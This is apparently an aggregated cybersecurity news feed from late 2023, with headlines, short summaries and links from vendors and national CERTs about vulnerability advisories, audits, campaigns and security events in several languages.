https://talosintelligence.com/vulnerability_reports/TALOS-2023-1794
Microsoft Office Professional Plus 2019 FCommitHtmlPivotCacheElement use-after-free vulnerability
2023-11-15T00:00:00Z | 1700006400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1835
Our audit of PyPI
2023-11-14T13:00:37Z | 1699966837

This is a joint post with the PyPI maintainers; read their announcement here! This audit was sponsored by the Open Tech Fund as part of their larger mission to secure critical pieces of internet infrastructure. You can read the full report in our Publications repository. Late this summer, we performed an audit […]

https://blog.trailofbits.com/2023/11/14/our-audit-of-pypi/
The National Cyber Security Centre Finland’s weekly review – 45/2023
2023-11-14T12:39:18Z | 1699965558

This week, our topics include the rescinding of the alert concerning the wave of Microsoft 365 account breaches and our ‘Turvallisesti netissä’ series on OnniTV.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-452023
The National Cyber Security Centre Finland’s weekly review – 45/2023
2023-11-14T12:39:18Z | 1699965558

This week, our topics include the rescinding of the alert concerning the wave of Microsoft 365 account breaches and our ‘Turvallisesti netissä’ series on OnniTV.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-452023
Cato Networks Takes a Bite of the Big Apple
2023-11-14T10:38:24Z | 1699958304

My new favorite company took center stage in iconic New York Times Square today with a multi-story high 3D visualization of our revolutionary secure access service edge (SASE) platform. It’s positively mesmerizing, take a look:  The move signals a seismic shift happening across enterprises, the need to have an IT infrastructure that can easily adapt... The post Cato Networks Takes a Bite of the Big Apple  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-networks-takes-a-bite-of-the-big-apple/
RIA ja Cybernetica alustavad Eesti digiidentiteedi kukru väljatöötamist
2023-11-14T10:12:03Z | 1699956723

Cybernetica hakkab koostöös Riigi Infosüsteemi Ametiga (RIA) analüüsima tulevase Eesti digikukru tehnilise lahenduse arhitektuuri ning selle haakuvust juba välja kujunenud elektroonilise identiteedi ökosüsteemiga. Eduka analüüsi tulemusena saab tulevikus dokumente nagu ID-kaart ja juhiluba kasutada mobiiltelefoni abil.

https://ria.ee/uudised/ria-ja-cybernetica-alustavad-eesti-digiidentiteedi-kukru-valjatootamist
Weston Embedded uC-HTTP HTTP Server form boundary heap-based buffer overflow vulnerability
2023-11-14T00:00:00Z | 1699920000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1733
Weston Embedded uC-HTTP HTTP Server Host header parsing memory corruption vulnerability
2023-11-14T00:00:00Z | 1699920000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1746
Weston Embedded uC-HTTP HTTP Server out-of-bounds write vulnerability
2023-11-14T00:00:00Z | 1699920000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1725
Weston Embedded uC-HTTP HTTP Server form boundary memory corruption vulnerability
2023-11-14T00:00:00Z | 1699920000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1738
Weston Embedded uC-HTTP HTTP Server buffer overflow vulnerability
2023-11-14T00:00:00Z | 1699920000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1726
Weston Embedded uC-HTTP HTTP Server memory corruption vulnerability
2023-11-14T00:00:00Z | 1699920000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1732
NCSC warns of enduring and significant threat to UK's critical infrastructure
2023-11-13T15:53:34Z | 1699890814

The NCSC's seventh Annual Review raises awareness of the increasingly unpredictable threat landscape.

https://www.ncsc.gov.uk/news/ncsc-warns-enduring-significant-threat-to-uks-critical-infrastructure
Support Telecom Providers on the Journey from Telco to Techco
2023-11-13T14:00:00Z | 1699884000

https://www.akamai.com/blog/security/2023/nov/support-telecom-providers-from-telco-to-techco
Oktoober Eesti küberruumis: ummistusrünnete lained ja suure mõjuga katkestused
2023-11-13T08:31:00Z | 1699864260

Riigi Infosüsteemi Amet (RIA) avaldas ülevaate oktoobrikuus küberruumis toimunust. Muu hulgas selgub sealt, et Eesti asutusi ja ettevõtteid tabas mitu ummistusrünnete lainet ja taas esines ka laialdase mõjuga teenusekatkestusi.

https://ria.ee/uudised/oktoober-eesti-kuberruumis-ummistusrunnete-lained-ja-suure-mojuga-katkestused
Security Alert (A23-11-09): Vulnerability in QNAP Products
2023-11-13T04:00:00Z | 1699848000

QNAP has published a security advisory to address a vulnerability in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Suur küberõppus pani proovile riigi küberreservi
2023-11-11T09:01:54Z | 1699693314

6.–9. novembrini toimus Riigi Infosüsteemi Ameti (RIA) eestvedamisel õppus, kus küberreservi kuuluvate IT- ja küberturvalisuse ekspertide ülesanne oli leida häkkerid Tele2 ja Elektrilevi IT-süsteemidest.

https://ria.ee/uudised/suur-kuberoppus-pani-proovile-riigi-kuberreservi
The warning about the Microsoft 365 security breach has been removed
2023-11-10T11:50:19Z | 1699617019

The phishing campaign that hijacked the e-mail accounts of Finnish organisations has subsided, and the number of reports of Microsoft 365 account breaches has declined. Similar large-scale phishing and security breach campaigns will possibly be seen in the future as well, but at the moment there is no reason to be alarmed.

https://www.kyberturvallisuuskeskus.fi/en/news/warning-about-microsoft-365-security-breach-has-been-removed
The warning about the Microsoft 365 security breach has been removed
2023-11-10T11:50:19Z | 1699617019

The phishing campaign that hijacked the e-mail accounts of Finnish organisations has subsided, and the number of reports of Microsoft 365 account breaches has declined. Similar large-scale phishing and security breach campaigns will possibly be seen in the future as well, but at the moment there is no reason to be alarmed.

https://www.kyberturvallisuuskeskus.fi/en/news/warning-about-microsoft-365-security-breach-has-been-removed
Security Alert (A23-11-08): Multiple Vulnerabilities in Microsoft Edge
2023-11-10T04:00:00Z | 1699588800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Virtually Patch Vulnerabilities with Microsegmentation and Akamai Hunt
2023-11-09T14:00:00Z | 1699538400

https://www.akamai.com/blog/security/2023/nov/virtually-patch-vulnerabilities-with-microsegmentation-akamai-hunt
Partnerships built on values and powerful innovation
2023-11-09T13:00:00Z | 1699534800

At Partner Summit, Cisco celebrates an unmatched global ecosystem, exciting new products, and shared opportunities.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m11/partnerships-built-on-values-and-powerful-innovation.html
Incorrect default configuration on the ServiceNow platform allows data leakage
2023-11-09T11:50:18Z | 1699530618

About a week ago, ServiceNow announced on its support site that misconfigurations of the platform could allow sensitive data to be leaked. The data security flaw in question is a critical concern for organisations using the service, as it can lead to a significant data leak of sensitive company data. The National Cyber Security Centre Finland is aware of cases where this data security flaw has been exploited.

https://www.kyberturvallisuuskeskus.fi/en/news/incorrect-default-configuration-servicenow-platform-allows-data-leakage
Incorrect default configuration on the ServiceNow platform allows data leakage
2023-11-09T11:50:18Z | 1699530618

About a week ago, ServiceNow announced on its support site that misconfigurations of the platform could allow sensitive data to be leaked. The data security flaw in question is a critical concern for organisations using the service, as it can lead to a significant data leak of sensitive company data. The National Cyber Security Centre Finland is aware of cases where this data security flaw has been exploited.

https://www.kyberturvallisuuskeskus.fi/en/news/incorrect-default-configuration-servicenow-platform-allows-data-leakage
Security Alert (A23-11-07): Vulnerability in Google Chrome
2023-11-09T04:00:00Z | 1699502400

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Save the Date for VulnCon 2024!
2023-11-09T00:00:00Z | 1699488000

Focused on the Global Vulnerability Management Ecosystem, attendees will have the opportunity to advance the art and science of vulnerability management with industry leaders.

https://www.first.org/newsroom/announce/20231109
SOC teams Address Hybrid Attacks with Vectra CDR for AWS by Nicole Drake
2023-11-09T00:00:00Z | 1699488000

Vectra CDR for AWS enables SOC teams to keep pace with the ever-growing speed and scale of sophisticated hybrid attack.

https://www.vectra.ai/blog/soc-teams-address-hybrid-attacks-with-vectra-cdr-for-aws
SLP Sliding Away With Reflection Amplification Thanks To CVE-2023-29552
2023-11-09T00:00:00Z | 1699488000

Explore the high-severity vulnerability CVE-2023-29552 in the Service Location Protocol (SLP) that enables potential attackers to launch powerful Denial-of-Service (DoS) attacks. Learn about the potential impacts, the affected organizations, and the steps to mitigate this vulnerability. Discover how GreyNoise's new tag helps identify sources scanning for internet accessible endpoints exposing the SLP and how their customers can gain proactive protection.

https://www.greynoise.io/blog/slp-sliding-away-with-reflectionamplification-thanks-to-cve-2023-29552
6 Strategies to Combat Advanced Persistent Threats
2023-11-08T14:00:00Z | 1699452000

https://www.akamai.com/blog/security/2023/nov/6-strategies-to-combat-advanced-persistent-threats
Akamai Named an Overall Leader for API Security
2023-11-08T10:00:00Z | 1699437600

https://www.akamai.com/blog/security/2023/nov/akamai-named-an-overall-leader-for-api-security
CVE-2023-3324
2023-11-07T16:28:00Z | 1699374480

The vulnerability is caused by the using deprecated deserialization functions and/or classes such as BinaryFormatter in the zenon internal graphic utility DLLs.

https://claroty.com/team82/disclosure-dashboard/cve-2023-3324
CVE-2023-3323
2023-11-07T16:27:00Z | 1699374420

The vulnerability is caused by the default directory permissions for the Zenon Projects directory in the engineering studio default workspace. By allowing access to all the users on the system, the attacker may alter the zenon project itself to load arbitrary zenon projects in the zenon runtime.

https://claroty.com/team82/disclosure-dashboard/cve-2023-3323
CVE-2023-3322
2023-11-07T16:26:00Z | 1699374360

Code Execution through overwriting service executable in utilities directory. The vulnerability is caused by the weakly configured default directory permission for the ABB Utilities directory.

https://claroty.com/team82/disclosure-dashboard/cve-2023-3322
CVE-2023-3321
2023-11-07T16:25:00Z | 1699374300

A low privileged user may update the contents of the file ‘CDDataHub.conf‘ present in ABB service grid data hub directory ‘C:\ProgramData\ABB\System\ServiceGrid\DataHub’ allowing the users to access Mosquitto configuration files on the zenon system.

https://claroty.com/team82/disclosure-dashboard/cve-2023-3321
The National Cyber Security Centre Finland’s weekly review – 44/2023
2023-11-07T08:26:01Z | 1699345561

This week, we take a look at a scam campaign aimed at defrauding victims of rent payments and maintenance charges and a misconfiguration in the ServiceNow platform that has exposed organisations to data leaks. Other topics include the NCSC-FI’s future-themed November and the Digital and Population Data Services Agency’s Taisto exercise.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-442023
The National Cyber Security Centre Finland’s weekly review – 44/2023
2023-11-07T08:26:01Z | 1699345561

This week, we take a look at a scam campaign aimed at defrauding victims of rent payments and maintenance charges and a misconfiguration in the ServiceNow platform that has exposed organisations to data leaks. Other topics include the NCSC-FI’s future-themed November and the Digital and Population Data Services Agency’s Taisto exercise.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-442023
Security Alert (A23-11-06): Multiple Vulnerabilities in Android
2023-11-07T04:00:00Z | 1699329600

Google has released Android Security Bulletin November 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Technical analysis: Barracuda Email Security Gateway by Quentin Olagne
2023-11-07T00:00:00Z | 1699315200

On May 23rd, 2023, Barracuda announced a vulnerability (CVE-2023-2868) in their Email Security Gateway appliance that was being exploited in the wild as far back as October of 2022.

https://www.vectra.ai/blog/technical-analysis-barracuda-email-security-gateway
Adding build provenance to Homebrew
2023-11-06T13:00:37Z | 1699275637

This is a joint post with Alpha-Omega—read their announcement post as well! We’re starting a new project in collaboration with Alpha-Omega and OpenSSF to improve the transparency and security of Homebrew. This six-month project will bring cryptographically verifiable build provenance to homebrew-core, allowing end users and companies to prove that Homebrew’s packages […]

https://blog.trailofbits.com/2023/11/06/adding-build-provenance-to-homebrew/
Uuenda oma kontaktandmeid riiklikus postkastis, et sõeluuringu kutsed õigeaegselt kätte saada
2023-11-06T12:00:22Z | 1699272022

Tervisekassa tuletab rinna-, emakakaela- ja jämesoolevähi sõeluuringute sihtrühma kuuluvatele inimestele meelde, et kuni selle aasta lõpuni on neil võimalik veel sõeluuringul osaleda. Kui kutset pole tulnud, tasub eesti.ee-s asuvas riiklikus postkastis oma andmed üle vaadata.

https://ria.ee/uudised/uuenda-oma-kontaktandmeid-riiklikus-postkastis-et-soeluuringu-kutsed-oigeaegselt-katte
Security Alert (A23-11-04): Multiple Vulnerabilities in Microsoft Edge
2023-11-06T04:00:00Z | 1699243200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-11-05): Multiple Vulnerabilities in QNAP Products
2023-11-06T04:00:00Z | 1699243200

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
The Future of the SLA: How to Build the Perfect Network Without MPLS
2023-11-05T07:24:33Z | 1699169073

The post The Future of the SLA: How to Build the Perfect Network Without MPLS appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-future-of-the-sla-how-to-build-the-perfect-network-without-mpls/
RIA uuendas küberturbe soovitusi tippjuhtidele
2023-11-03T09:54:32Z | 1699005272

Riigi Infosüsteemi Amet (RIA) avaldas uuendatud kujul 11+ soovitust tippjuhtidele oma ettevõtete ja asutuste küberturvalisuse tagamisel.

https://ria.ee/uudised/ria-uuendas-kuberturbe-soovitusi-tippjuhtidele
Vulnerability in Apereo CAS software
2023-11-03T05:00:00Z | 1698987600

CERT Poland has received a report about vulnerability in the Apereo CAS software and assigned it the number CVE-2023-4612.

https://cert.pl/en/posts/2023/11/CVE-2023-4612/
High Threat Security Alert (A23-11-03): Vulnerability in Apache ActiveMQ
2023-11-03T04:00:00Z | 1698984000

Apache Software Foundation has released a security advisory to address a vulnerability in Apache ActiveMQ.

https://www.govcert.gov.hk/en/alerts_detail.php
Cisco IOS XE Privilege Escalation (CVE-2023-20198) – Cato’s analysis and mitigation
2023-11-02T19:20:47Z | 1698952847

By Vadim Freger, Dolev Moshe Attiya, Shirley Baumgarten All secured webservers are alike; each vulnerable webserver running on a network appliance is vulnerable in its own way. On October 16th 2023 Cisco published a security advisory detailing an actively exploited vulnerability (CVE-2023-20198) in its IOS XE operating system with a 10 CVSS score, allowing for... The post Cisco IOS XE Privilege Escalation (CVE-2023-20198) – Cato’s analysis and mitigation appeared first on Cato Networks.

https://www.catonetworks.com/blog/cisco-ios-xe-privilege-escalation-cve-2023-20198/
Security Alert (A23-11-02): Multiple Vulnerabilities in Cisco Products
2023-11-02T04:00:00Z | 1698897600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Unveiling the Deceptive World: Honeypots vs Honeytokens
2023-11-02T00:00:00Z | 1698883200

Despite each’s similar purpose of early threat detection, honeypots and honeytokens vastly differ in deployment, interaction, and scope. Let's delve into the various aspects that contribute to the misunderstanding and clarify the distinctive features of each.

https://www.greynoise.io/blog/unveiling-the-deceptive-world-honeypots-vs-honeytokens
FIRST has officially published the latest version of the Common Vulnerability Scoring System (CVSS v4.0)
2023-11-01T17:00:00Z | 1698858000

In June 2023, attendees at the 35th Annual FIRST Conference, in Montréal, Canada got a first-look preview of the new version of the Common Vulnerability Scoring System (CVSS), version 4.0. After two month of public comment followed by two months of addressing those comments, FIRST is proud to announce the official publication of CVSS version 4.0.

https://www.first.org/newsroom/releases/20231101
FIRST has officially published the latest version of the Common Vulnerability Scoring System (CVSS v4.0)
2023-11-01T17:00:00Z | 1698858000

In June 2023, attendees at the 35th Annual FIRST Conference, in Montréal, Canada got a first-look preview of the new version of the Common Vulnerability Scoring System (CVSS), version 4.0. After two month of public comment followed by two months of addressing those comments, FIRST is proud to announce the official publication of CVSS version 4.0.

https://www.first.org/newsroom/releases/20231101
The National Cyber Security Centre Finland’s weekly review – 43/2023
2023-11-01T15:05:20Z | 1698851120

This week we take another look at the recent wave of Microsoft 365 account breaches and report on another wave of data breaches carried out on vulnerable Cisco network devices. We also remind our readers that the recordings and materials of the Tietoturva 2023 information security seminar and the results seminar of the Ketjutonttu campaign are now available on our website.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-432023
The National Cyber Security Centre Finland’s weekly review – 43/2023
2023-11-01T15:05:20Z | 1698851120

This week we take another look at the recent wave of Microsoft 365 account breaches and report on another wave of data breaches carried out on vulnerable Cisco network devices. We also remind our readers that the recordings and materials of the Tietoturva 2023 information security seminar and the results seminar of the Ketjutonttu campaign are now available on our website.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-432023
Gartner’s New Research for Reimagining IT Skills Investment
2023-11-01T15:01:18Z | 1698850878

The post Gartner’s New Research for Reimagining IT Skills Investment  appeared first on Cato Networks.

https://www.catonetworks.com/resources/gartners-new-research-for-reimagining-it-skills-investment/
Tietoturva 2023 information security seminar looked to the future of information security
2023-11-01T14:50:34Z | 1698850234

The Tietoturva 2023 information security seminar was held on Thursday 12 October 2023 in Helsinki and online. The theme of this year’s seminar was the future of cyber security and threats. Some of the most frequently highlighted topics in the seminar presentations included AI and supply chains.

https://www.kyberturvallisuuskeskus.fi/en/news/tietoturva-2023-information-security-seminar-looked-future-information-security
Tietoturva 2023 information security seminar looked to the future of information security
2023-11-01T14:50:34Z | 1698850234

The Tietoturva 2023 information security seminar was held on Thursday 12 October 2023 in Helsinki and online. The theme of this year’s seminar was the future of cyber security and threats. Some of the most frequently highlighted topics in the seminar presentations included AI and supply chains.

https://www.kyberturvallisuuskeskus.fi/en/news/tietoturva-2023-information-security-seminar-looked-future-information-security
The Hidden Costs of Outsourcing Healthcare Revenue Cycle Management
2023-11-01T13:00:00Z | 1698843600

https://www.akamai.com/blog/security/2023/oct/the-hidden-costs-of-outsourcing-healthcare-rcm
Nimelised @eesti.ee lõpuga e-posti aadressid on tänasest suletud
2023-11-01T06:19:42Z | 1698819582

Riigi Infosüsteemi Amet (RIA) tuletab meelde, et alates tänasest, 1. novembrist on suletud erakirjavahetuseks loodud eesnimi.perekonnanimi@eesti.ee ja ettevõttenimi@eesti.ee e-posti aadressid.

https://ria.ee/uudised/nimelised-eestiee-lopuga-e-posti-aadressid-tanasest-suletud
Security Alert (A23-11-01): Multiple Vulnerabilities in Google Chrome
2023-11-01T04:00:00Z | 1698811200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Quickly Triaging HTTP Traffic From GreyNoise’s New Hosted Sensors
2023-11-01T00:00:00Z | 1698796800

The GreyNoise Labs team shares one way to dig into HTTP content in PCAPs generated by our Early Access Program sensors.

https://www.greynoise.io/blog/quickly-triaging-http-traffic-from-greynoises-new-hosted-sensors
Scam calls and denial-of-service attacks caused some rain in September's Cyber weather
2023-10-31T10:56:34Z | 1698749794

September was coloured by scam calls and denial-of-service attacks. A record number of scam calls from fake numbers were even reported before Traficom's regulation came into effect at the beginning of October. The glint of light during the month was the decrease in the number of notifications about data breaches, data breach attempts and data leaks.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_09/2023
Scam calls and denial-of-service attacks caused some rain in September's Cyber weather
2023-10-31T10:56:34Z | 1698749794

September was coloured by scam calls and denial-of-service attacks. A record number of scam calls from fake numbers were even reported before Traficom's regulation came into effect at the beginning of October. The glint of light during the month was the decrease in the number of notifications about data breaches, data breach attempts and data leaks.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_09/2023
TunnelCrack Vulnerabilities
2023-10-31T05:44:30Z | 1698731070

SonicWall PSIRT is aware of a research publication that outlines a series of attacks known as 'TunnelCrack' vulnerabilities. These attacks occur when VPN client traffic leaks outside of the secure VPN tunnel, typically happening when clients connect to untrusted networks, like rogue Wi-Fi access points. A Local Network attacker takes advantage of local network access features in various VPN clients from different vendors, allowing an attacker to access unencrypted traffic and an attacker intercepts traffic that's directed to a fake VPN gateway using DNS spoofing attacks. However, these attacks do not provide the attacker with the ability to decrypt HTTPS or other encrypted traffic.  CVE: CVE-2023-36671, CVE-2023-36672, CVE-2023-35838, CVE-2023-36673 Last updated: Oct. 31, 2023, 5:44 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0015
High Threat Security Alert (A23-10-28): Vulnerability in F5 BIG-IP
2023-10-31T04:00:00Z | 1698724800

F5 has published a security advisory to address a vulnerability in BIG-IP.

https://www.govcert.gov.hk/en/alerts_detail.php
Campanha Internet Segura: #LerAntesClicarDepois
2023-10-31T00:00:00Z | 1698710400

No dia 30 de outubro, no Porto, foi lançada a 2.ª Fase da Campanha #LerAntesClicarDepois, integrada no Fórum das Competências Digitais, promovido pelo INCoDe.2030. A coordenadora do Departamento de Desenvolvimento e Inovação do CNCS, Isabel Baptista, reforçou a importância desta campanha pedagógica e multiplataforma, "o CNCS sentiu a necessidade e sente, diariamente, de sensibilizar toda a população, porque o número de incidentes registados continua a aumentar”, realçando que o ransomware continua a marcar o dia-a-dia das empresas. A 1.ª fase da campanha decorreu durante o mês de maio, em parceria com a RTP, o Centro Internet Segura, Instituições de Ensino Superior, municípios, empresas, tais como os CTT, o Metro de Lisboa, a Microsoft e a TAP, bem como organismos de Administração Pública. Chegar a todas as pessoas, independentemente do seu nível de literacia digital, através de meios de comunicação como a imprensa e as redes sociais esteve na base da campanha pedagógica e multiplataforma, fruto de um trabalho conjunto com o Conselho Superior de Segurança do Ciberespaço.   Através de uma brochura informativa, cartões com mensagens de alerta e um kit de vídeos curtos em formato de animação, que abordam o phishing, o smishing, o vishing, a extorsão sexual, o cyberbulling,  as compras online, as redes sociais, e boas práticas de cibersegurança para empresas, desenvolvidas em parceria com o IPAMEI, #LerAntesClicarDepois quer ter expressão nacional e chegar a pessoas de todas as idades, alertando-as para os perigos e as ameaças associadas ao mundo digital. O CNCS desafia os cidadãos e as organizações a juntarem-se à missão de fortalecer a consciência sobre a segurança digital através da partilha de um conjunto de boas práticas: https://www.cncs.gov.pt/pt/campanha-lerantesclicardepois/.

https://dyn.cncs.gov.pt/pt/detalhe/art/135809/campanha-internet-segura-lerantesclicardepois
Publicado Boletim 4.2023 do Observatório de Cibersegurança
2023-10-31T00:00:00Z | 1698710400

A quarta edição de 2023 do Boletim do Observatório de Cibersegurança destaca a Criptografia, que está na base de muitas tecnologias de segurança da informação e é essencial para garantir a segurança das nossas comunicações e transações digitais. O Boletim é também uma oportunidade para divulgar publicações e notícias de interesse. Consulte o documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135808/publicado-boletim-42023-do-observatorio-de-ciberseguranca
Challenges in Azure Log Monitoring: Insights for Your SOC by Dmitriy Beryoza
2023-10-31T00:00:00Z | 1698710400

Vectra AI’s Security Research Team identified issues in Entra ID and Microsoft 365 logs that make your job harder — and may help attackers evade detection.

https://www.vectra.ai/blog/challenges-in-azure-log-monitoring-insights-for-your-soc
The issue with ATS in Apple’s macOS and iOS
2023-10-30T12:00:57Z | 1698667257

Trail of Bits is publicly disclosing a vulnerability (CVE-2023-38596) that affects iOS, iPadOS, and tvOS before version 17, macOS before version 14, and watchOS before version 10. The flaw resides in Apple’s App Transport Security (ATS) protocol handling. We discovered that Apple’s ATS fails to require the encryption of connections to IP […]

https://blog.trailofbits.com/2023/10/30/the-issue-with-ats-in-apples-macos-and-ios/
SSE Is a Proven Path for Getting To SASE
2023-10-30T09:31:08Z | 1698658268

Modern enterprise complexity is challenging cybersecurity programs. With the widespread adoption of cloud services and remote work, and the broadening distribution of applications and employees away from traditional corporate locations, organizations require a more flexible and scalable approach to network security. SASE technology can help address these issues, making SASE adoption a goal for many... The post SSE Is a Proven Path for Getting To SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/sse-is-a-proven-path-for-getting-to-sase/
Security Alert (A23-10-27): Multiple Vulnerabilities in Microsoft Edge
2023-10-30T04:00:00Z | 1698638400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Logging Made Easy with CISA
2023-10-27T14:28:34Z | 1698416914

The US Cybersecurity and Infrastructure Security Agency have relaunched an updated version of LME.

https://www.ncsc.gov.uk/blog-post/logging-made-easy-with-cisa
Protecting Small and Medium-Sized Businesses from Cyberthreats
2023-10-27T14:00:00Z | 1698415200

https://www.akamai.com/blog/security/2023/oct/protecting-small-and-medium-sized-businesses-from-cyberthreats
How to Defend Against Account Opening Abuse
2023-10-26T13:00:00Z | 1698325200

https://www.akamai.com/blog/security/2023/oct/how-to-defend-against-account-opening-abuse
High Threat Security Alert (A23-10-24): Multiple Vulnerabilities in VMware Products
2023-10-26T04:00:00Z | 1698292800

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-25): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-10-26T04:00:00Z | 1698292800

Apple has released iOS 15.8, iOS 16.7.2, iOS 17.1, iPadOS 15.8, iPadOS 16.7.2 and iPadOS 17.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-26): Vulnerability in OpenSSL
2023-10-26T04:00:00Z | 1698292800

OpenSSL has released 3.0.12 and 3.1.4 to fix the vulnerability in various versions of OpenSSL.

https://www.govcert.gov.hk/en/alerts_detail.php
The Defenders’ Dilemma – the need to be heard by Mark Wojtasiak
2023-10-26T00:00:00Z | 1698278400

In my last post, we talked about the importance of security testing as one of the best ways to improve defenders’ skills and expertise and build confidence that ongoing security investments continue to provide ROI.

https://www.vectra.ai/blog/the-defenders-dilemma-the-need-to-be-heard
CVE-2023-4966 Helps Usher In A Baker’s Dozen Of Citrix Tags To Further Help Organizations Mitigate Harm
2023-10-26T00:00:00Z | 1698278400

Citrix's NetScaler ADC and NetScaler Gateway have, once more, been found to have multiple vulnerabilities, tracked as CVE-2023-4966 and CVE-2023-4967. Read this blog to get all the details.

https://www.greynoise.io/blog/cve-2023-4966-helps-usher-in-a-bakers-dozen-of-citrix-tags-to-further-help-organizations-mitigate-harm
Expert Cybersecurity Awareness: Test Your Attack Knowledge
2023-10-25T13:00:00Z | 1698238800

Hey, security experts: Can you recognize an attack from the code alone? Test your attack knowledge skills with this quick quiz.

https://www.akamai.com/blog/security-research/2023/oct/expert-cybersecurity-awareness-test-attack-knowledge
SonicWall SSO Agent - Directory Services Connector MSI Local Privilege Escalation Vulnerability
2023-10-25T08:30:07Z | 1698222607

A local privilege escalation vulnerability in SonicWall Directory Services Connector Windows MSI client 4.1.21 and earlier versions allows a local low-privileged user to gain system privileges through running the recovery feature. SonicWall strongly advises SonicWall SSO Agent (Directory Services Connector) client users to upgrade to the latest release version. CVE: CVE-2023-44219 Last updated: Oct. 25, 2023, 8:30 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0016
SonicWall NetExtender Windows Client DLL Search Order Hijacking Vulnerability
2023-10-25T08:25:31Z | 1698222331

SonicWall NetExtender Windows (32 and 64-bit) client 10.2.336 and earlier versions have a DLL Search Order Hijacking vulnerability in the start-up DLL component. Successful exploitation via a local attacker could result in command execution in the target system. SonicWall strongly advises SSL VPN NetExtender client users to upgrade to the latest release version. CVE: CVE-2023-44220 Last updated: Oct. 25, 2023, 8:25 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0017
Security Alert (A23-10-22): Vulnerability in Google Chrome
2023-10-25T04:00:00Z | 1698206400

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-23): Multiple Vulnerabilities in Firefox
2023-10-25T04:00:00Z | 1698206400

Mozilla has published the advisories (MFSA2023-45 and MFSA2023-46) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
The Importance of Allyship for Women in Tech
2023-10-24T13:00:00Z | 1698152400

https://www.akamai.com/blog/culture/2023/oct/the-importance-of-allyship-for-women-in-tech
Malware stories: Deworming the XWorm
2023-10-24T12:37:00Z | 1698151020

XWorm is a multi-purpose malware family, commonly used as RAT. This post contains a detailed analysis and walk-through the reverse-engineering process.

https://cert.pl/en/posts/2023/10/deworming-the-xworm/
SASE as a Gradual Deployment: The Various Paths to SASE
2023-10-24T11:57:20Z | 1698148640

The post SASE as a Gradual Deployment: The Various Paths to SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-as-a-gradual-deployment-the-various-paths-to-sase/
The National Cyber Security Centre Finland’s weekly review – 42/2023
2023-10-24T08:58:09Z | 1698137889

This week we cover the recent wave of Microsoft 365 account breaches and provide instructions for securing home networks and routers.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-422023
The National Cyber Security Centre Finland’s weekly review – 42/2023
2023-10-24T08:58:09Z | 1698137889

This week we cover the recent wave of Microsoft 365 account breaches and provide instructions for securing home networks and routers.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-422023
Radiflow’s Services Keep Facilities Humming as OT-Networks Face Threat and Compliance Shifts
2023-10-24T07:49:23Z | 1698133763

The post Radiflow’s Services Keep Facilities Humming as OT-Networks Face Threat and Compliance Shifts appeared first on Radiflow.

https://www.globalsecuritymag.com/Radiflow-s-Services-Keep-Facilities-Humming-as-OT-Networks-Face-Threat-and.html
Security Alert (A23-10-21): Multiple Vulnerabilities in VMware Products
2023-10-24T04:00:00Z | 1698120000

VMware has published security advisories to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Team Portugal na oitava edição do European Cybersecurity Challenge
2023-10-24T00:00:00Z | 1698105600

